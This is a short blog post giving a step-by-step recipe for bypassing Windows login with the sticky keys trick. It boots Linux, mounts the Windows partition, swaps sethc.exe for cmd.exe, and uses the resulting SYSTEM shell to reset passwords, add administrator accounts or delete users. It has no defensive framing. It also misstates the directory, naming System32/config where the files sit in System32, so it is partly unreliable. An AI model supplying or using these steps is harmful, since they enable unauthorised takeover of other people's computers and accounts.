Post

Sticky Keys Windows Login Bypass

Posted
By Alexander Wells
1 min read

Using a live boot of Linux, we can bypass windows login by changing the sticky keys executable to command prompt. When at the windows login screen, stick keys can be activated to spawn a shell running as SYSTEM. A new user can be created, or the password can be changed for an existing account.

  1. Prerequisites
  2. Mount Drive
  3. Update EXE Names
  4. Bypass Login

Prerequisites

  • Physical access to a Windows Machine without BitLocker
  • Bootable Linux USB (ideally Kali)


Mount Drive

Create a new directory where the drive will be mounted:

1

mkdir FOLDER_NAME

List Block Devices:

1

lsblk

Mount the primary windows partition (it should be the largest one there):

1

mount /dev/PARTITION_NAME FOLDER_NAME
  • FOLDER_NAME is the folder created above


Update EXE Names

Navigate to Windows/System32/config in the mounted drive

Rename the sethc.exe file (this is sticky keys):

1

mv sethc.exe sethcBackup.exe

Make a copy of cmd.exe and rename it to sethc.exe:

1

cp cmd.exe sethc.exe


Bypass Login

When at the login screen, pressing shift 5 times should now spawn a shell running as SYSTEM.

Change a Password

1

net user USERNAME NEW_PASSWORD

Create new Admin

1
2

net user /add USERNAME PASSWORD
net localgroup administrators USERNAME /add

Delete User

1

net user /delete USERNAME
security, windows
security windows kali passwords privesc
This post is licensed under CC BY 4.0 by the author.